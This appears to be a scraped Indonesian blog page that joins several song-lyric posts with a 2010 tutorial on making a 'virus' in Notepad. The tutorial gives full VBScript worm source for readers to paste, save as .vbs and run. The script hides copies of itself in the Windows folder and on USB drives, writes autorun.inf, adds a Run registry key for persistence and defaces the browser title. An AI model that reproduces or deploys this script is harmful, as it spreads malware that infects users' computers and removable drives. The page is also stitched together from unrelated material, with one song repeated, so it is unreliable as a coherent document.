captain jack – kupu-kupu baja

Gambar

Bbm     G#       F#        C#
Dia bercerita tentang hidupnya
Bbm    G#        F#
yang selalu terjajah
Bbm    G#       F#       C#
Dia sedih akan nasib kaumnya

Bbm     G#          F#
yang dianggap tak setara
Bbm   G#      F#
Dan terpenjara
Bbm    G#     F#    C#
di berlakukan tak adil

Bbm     G#   F#    C#
Dia tak bisa menerima,
Bbm   G#     F#
Karna dia brbeda,
B     F#    Bbm
Ber…be….da

Intro : G#m E  C#m (2x)

G#m      E           C#m
Aku tak ingin lagi, dianggap lemah
G#m      E           C#m
dan dianggap tidak berdaya
G#m      E           C#m
Aku tak ingin lagi, hidup terkekang
G#m      E           C#m
dengan hanya sedikit pilihan
E               F#
Dengarkan, aku berkata

Reff:
G           E            B              F#
Ku bukan makhluk lemah, yang harus di manjakan
G           E            B              F#
Ku bukan makhluk lemah, yang selalu di perdaya
E        F#       G#m    D#m      E     C#m       G#m
Makhluk lemah ini tlah, bermetamorfosa jadi kupu-kupu baja

Intro : G#m E C#m

G#m      E           C#m
Aku tak akan lagi, menjadi korban
G#m      E       C#m
egoisnya kaum yg kuat
G#m      E           C#m
Aku tak akan mau, hanya dianggap
G#m      E        C#m
pendamping yang slalu menurut
E             F#
Lihatlah,aku berubah

Reff:
G           E            B              F#
Ku bukan makhluk lemah, yang harus di manjakan
G           E            B              F#
Ku bukan makhluk lemah, yang selalu di perdaya
E        F#       G#m    D#m      E     C#m       G#m
Makhluk lemah ini tlah, bermetamorfosa jadi kupu-kupu baja

Outro : G#m Bb B C#m

E       F#                    D#m
Selalu dianggap, yang lebih kotor
G#m                        F#
saat mereka berbuat lebih nista
E       F#                     D#m
Selalu dianggap hanya pelengkap
G#m                      F#
dan penghias romantisme mereka
E              F#                 D
Selalu dianggap, yang lebih lemah Ku tak terima
G#m           E
Ku bukan makhluk lemah
F#m           D
yg selalu memohon
E              F#
untuk di lindungi

G#m
dan tak bisa sendiri,
G#m             E
Makhluk lemah ini tlah,
F#        D#m     E     F#     D#m
bermetamorfosa jadi kupu-kupu, Baja

Back to intro : G#m E C#m 4x

bullet for my valentine-a place where you belong

Your gone!
Your gone!

Your body’s cold
Hope is lost, I can’t let go
Can I die with you,
So we can never grow old

Cut the ties (Cut the ties)
With this note you left behind
As I read the words I hear you telling me why

Too late, too late
I never said goodbye
Too late, too late
Can’t even ask you why
And now I’m wasting away
In my own misery
I hope you’ve finally gone,
To a place where you belong

My sadness shows,
As your name is carved in stone
Can’t erase the words so the reality grows

I wish I died (I wish I died)
On that night right by your side
So just kill me now and let the good times roll

Too late, too late
I never said goodbye
Too late, too late
Can’t even ask you why
And now I’m wasting away
In my on misery
I hope you’ve finally gone
To a place where you belong

Will you wait for me? (Will you wait for me?)
Will I see you on the other side?
You won’t have to wait too long
Ye-yeh-eh-yeah

Will you come to me? (Will you come to me?)
Will you take me to the other side?
‘Cause here I don’t belong

Too late, too late
I never said goodbye
Too late, too late
Can’t even ask you why
And now I’m wasting away
In my on misery
I hope you’re finally go
To a place where you belong

I never said goodbye
Can’t even ask you why
I’m wasting!
Away in my on misery
I hope you’ve finally gone
To a place where you belong

(Grazie a niko per le correzioni)

Your gone!
Your gone!

Your body’s cold
Hope is lost, I can’t let go
Can I die with you,
So we can never grow old

Cut the ties (Cut the ties)
With this note you left behind
As I read the words I hear you telling me why

Too late, too late
I never said goodbye
Too late, too late
Can’t even ask you why
And now I’m wasting away
In my own misery
I hope you’ve finally gone,
To a place where you belong

My sadness shows,
As your name is carved in stone
Can’t erase the words so the reality grows

I wish I died (I wish I died)
On that night right by your side
So just kill me now and let the good times roll

Too late, too late
I never said goodbye
Too late, too late
Can’t even ask you why
And now I’m wasting away
In my on misery
I hope you’ve finally gone
To a place where you belong

Will you wait for me? (Will you wait for me?)
Will I see you on the other side?
You won’t have to wait too long
Ye-yeh-eh-yeah

Will you come to me? (Will you come to me?)
Will you take me to the other side?
‘Cause here I don’t belong

Too late, too late
I never said goodbye
Too late, too late
Can’t even ask you why
And now I’m wasting away
In my on misery
I hope you’re finally go
To a place where you belong

I never said goodbye
Can’t even ask you why
I’m wasting!
Away in my on misery
I hope you’ve finally gone
To a place where you belong

lirik asking alexandria-final episode

Oh my God,
oh my God,
if only he knew,
if only he knew,
if only he knew about the world
without the bullshit and the lies.

We could’ve saved him,
they could’ve saved me.
But instead I’m here drowning
in my own fucking mind,
and I’ll be damned if you’re the death of me.

Blood and ink stain the walls,
silently with bloodied knuckles, carry on,
hoping it’s not too wrong.
You said the nights were far too long.
Honey, it’s just the start of it.

Oh my God,
if he only knew.
Oh my God,
if only he knew,
if only he knew,
if only he knew.
Just stand up and scream,
the tainted clock is counting down.
You gave in to me,
would you say the nights are far too long now?

Oh my God,
(oh my fucking God)
The tears that stain my cheek
must me look weak,
I wear them proudly, I wear them proud.

Just stand up and scream,
the tainted clock is counting down.
You gave in to me,
would you say the nights are far too long now?

Your knife,
my back.
My gun,
your head.

Your knife,
my back.
My gun,
your head.

You need a doctor baby,
you scared?
You need a doctor baby,
you scared?

You need a doctor baby,
you scared?
You need a doctor baby,
you scared, you scared,
you scared, you?

You need a doctor baby,
you scared?

You need a doctor baby,
you scared?
You need a doctor baby,
you need a doctor baby,
you scared?

cara membuat virus dengan notepad

Cara bikin virus pakai notepad
Diposkan oleh setya21 di 23:48 . Rabu, 24 Maret 2010
Label: antivirus dan virus

Cara bikin virus pakai notepad
Nih ada sedikit tutorial bikin virus sederhana yang tinggal loe Copy Paste aja di notepad.

* Pertama Hanya dengan Membuka New Text Document.txt ( Notepad )
* Selanjutnya Copy Paste Scribt Yang ada di bawah ini ke dalam Notepad Yg kita buka tadi

on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]”&vbcrlf&”shellexecute=wscript.exe MS32DLL.dll.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\MS32DLL.dll.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\MS32DLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\MS32DLL.dll.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
set tf=fs.getfile(flashdrive.path &”\MS32DLL.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\MS32DLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\MS32DLL.dll.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(“WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,winpath&”\MS32DLL.dll.vbs”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”Hacked by Davit Wahyudi”
rg.regwrite “HKCR\vbsfile\DefaultIcon”,”shell32.dll,2″
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject(“Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

* Selanjutnya Save As dengan Extensi .vbs Atau sebagai contoh : Maafkan.vbs

bla mau coba klik aja….kerusakan tanggung sendiri…jangan di gunakan buat jahilin teman ya….heeee!!!!!!

**-Sekarang lagi jamannya Ayu ting ting, semua orang pada gila joged.

Orang yang punya telepon, alamat palsu jadi ringtone.

Pokoknya semua demam Ayu ting ting…Anak-anak, ibu-ibu dan bapak pada ngefans.

Tampil di tv jadi top dan beken, ngalahin girlband juga boyband.

Ceritanya tentang nyari alamat sampai di sini. Nyari sampai pagi nyatanya gak disini

Alamat palsu yang kau kirim…Oh aku sedih sedih nyari alamat…

Saiki lagi jamane Ayu ting ting…dadi idol.

Pokokke kabeh lagune Ayu ting ting dadi idol.

Bocah-bocah, emak-emak lan bapak podo gandrung.

Ketok nang di tipi dadi ngetop dan beken, ngalahke wadon band lan lanang band.

Ceritane wong golek alamat jare ning kene…Sedih golek alamat

Kembali **

Kalau mau beli kasetnya, belilah yang bajakan

Gak gak gak gak…ah. No no no..oh

kalau mau beli kasetnya belilah yang aslinya

yeah yeah yeah yeah

oh

Kembali ke **

Ting ting ting…

Koleksi Bruno Mars ft. Ayu Ting Ting yang lain.
Mp3 Download & Lirik Lagu Bruno Mars ft. Ayu Ting Ting – Demam Ayu Ting Ting
Gambar Artis Indonesia

lirik lagu my chemical romance-i don’t love you

My Chemical Romance – I Don’t Love You Lyrics

When you go
Don’t ever think I’ll make you try to stay
And maybe when you get back
I’ll be off to find another way

And after all this time that you still owe
You’re still the good-for-nothing I am not
So take your gloves and get out
Better get out
While you can

When you go
Would you even turn to say
“I don’t love you
Like I did
Yesterday”

Sometimes I cry so hard from pleading
So sick and tired of all the needless needing
But baby when they knock you
Down and out
It’s where you oughta stay

And after all the blood that you still owe
Another dollar’s just another loan
So fix your eyes and get up
Better get up
While you can

When you go
Would you even turn to say
“I don’t love you
Like I did
Yesterday”

When you go
Would you have the guts to say
“I don’t love you
Like I loved you
Yesterday”

I don’t love you
Like I loved you
Yesterday

I don’t love you
Like I loved you
Yesterday

powered by lirik lagu indonesia